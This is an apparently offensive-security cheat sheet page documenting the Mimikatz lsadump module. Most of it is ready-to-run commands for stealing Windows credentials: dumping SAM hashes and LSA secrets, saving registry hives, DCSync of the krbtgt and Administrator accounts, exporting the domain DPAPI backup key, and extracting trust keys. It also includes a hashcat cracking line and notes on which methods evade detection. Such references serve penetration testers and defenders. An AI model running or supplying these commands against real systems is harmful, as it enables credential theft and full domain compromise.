🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🐱 Mimikatz / lsadump

lsadump

Dump credential databases from Windows systems: SAM, LSA secrets, cached credentials, DCSync, and more.

Prerequisites

Most commands require privilege::debug and/or token::elevate for SYSTEM-level access:

mimikatz # privilege::debug
mimikatz # token::elevate

sam β€” Dump SAM Database

Extract NTLM (and optionally LM) hashes from the Security Account Manager.

Online Mode (requires SYSTEM)

mimikatz # lsadump::sam

Offline Mode (registry hives)

First, save hives:

reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv

Then analyze offline:

mimikatz # lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv

secrets β€” Dump LSA Secrets

Extract LSA secrets (service account passwords, machine account password, cached domain credentials, DPAPI backup key, etc.).

mimikatz # lsadump::secrets

Offline:

reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SECURITY SecurityBkup.hiv
mimikatz # lsadump::secrets /system:SystemBkup.hiv /security:SecurityBkup.hiv

cache β€” Dump Cached Domain Credentials (MSCache2)

Extract domain cached credentials (DCC2 hashes). Used when DC is unavailable.

mimikatz # lsadump::cache

Crack with hashcat: hashcat -m 2100 hash.txt wordlist.txt (mode 2100 = MSCache2)

lsa β€” Query LSA Credential Store

Query domain user credentials directly from LSA.

mimikatz # lsadump::lsa [/patch] [/inject] [/id:<rid>] [/name:<username>]

Options

  • /patch β€” patch LSA to dump credentials from memory
  • /inject β€” inject into LSA process for extraction
  • /id:<rid> β€” query specific user by RID
  • /name:<username> β€” query specific user by name

Output includes: NTLM hashes, AES256/AES128/DES keys, WDigest credentials.

dcsync β€” DCSync (DRSR Protocol)

Use the Directory Replication Service Remote Protocol (MS-DRSR) to request credential data from a DC, as if we are another DC doing replication. No need to run code on the DC itself.

Required rights: Domain Admins, Enterprise Admins, or accounts with Replicating Directory Changes + Replicating Directory Changes All permissions.

mimikatz # lsadump::dcsync /user:<domain>\<username> [/domain:<domain>] [/dc:<dc-ip>] [/all] [/csv]

Options

  • /user:<domain>\<username> β€” target account to replicate (e.g. corp\krbtgt, corp\Administrator)
  • /domain:<domain> β€” target domain FQDN (auto-detected if omitted)
  • /dc:<dc-ip> β€” specific DC to replicate from (auto-detected if omitted)
  • /all β€” dump all accounts
  • /csv β€” output in CSV format

Examples

# Dump krbtgt hash (for golden ticket)
mimikatz # lsadump::dcsync /user:<domain>\krbtgt

# Dump Administrator
mimikatz # lsadump::dcsync /user:<domain>\Administrator

# Dump all accounts
mimikatz # lsadump::dcsync /all /domain:<domain>

# Dump from specific DC
mimikatz # lsadump::dcsync /user:<domain>\krbtgt /dc:<dc-ip>

trust β€” Dump Domain Trust Keys

Extract inter-domain trust keys.

mimikatz # lsadump::trust [/patch]

backupkeys β€” Dump DPAPI Domain Backup Key

Retrieve the domain DPAPI backup key (used to decrypt all user DPAPI blobs in the domain).

mimikatz # lsadump::backupkeys /system:<dc-fqdn> /export

netsync β€” NetSync

Replicate credentials using the NetLogon protocol (Netlogon replication / NTLM password sync).

mimikatz # lsadump::netsync /dc:<dc-ip> /user:<username> /ntlm:<nt-hash>

Notes

  • dcsync is the preferred method β€” runs from a regular domain-joined workstation, no code on DC, no LSASS touch
  • lsadump::lsa /patch touches LSASS and is more detectable
  • Cached credentials (MSCache2) are domain credentials hashed with the username β€” NOT pass-the-hash usable
  • Trust keys from lsadump::trust can be used to forge inter-realm tickets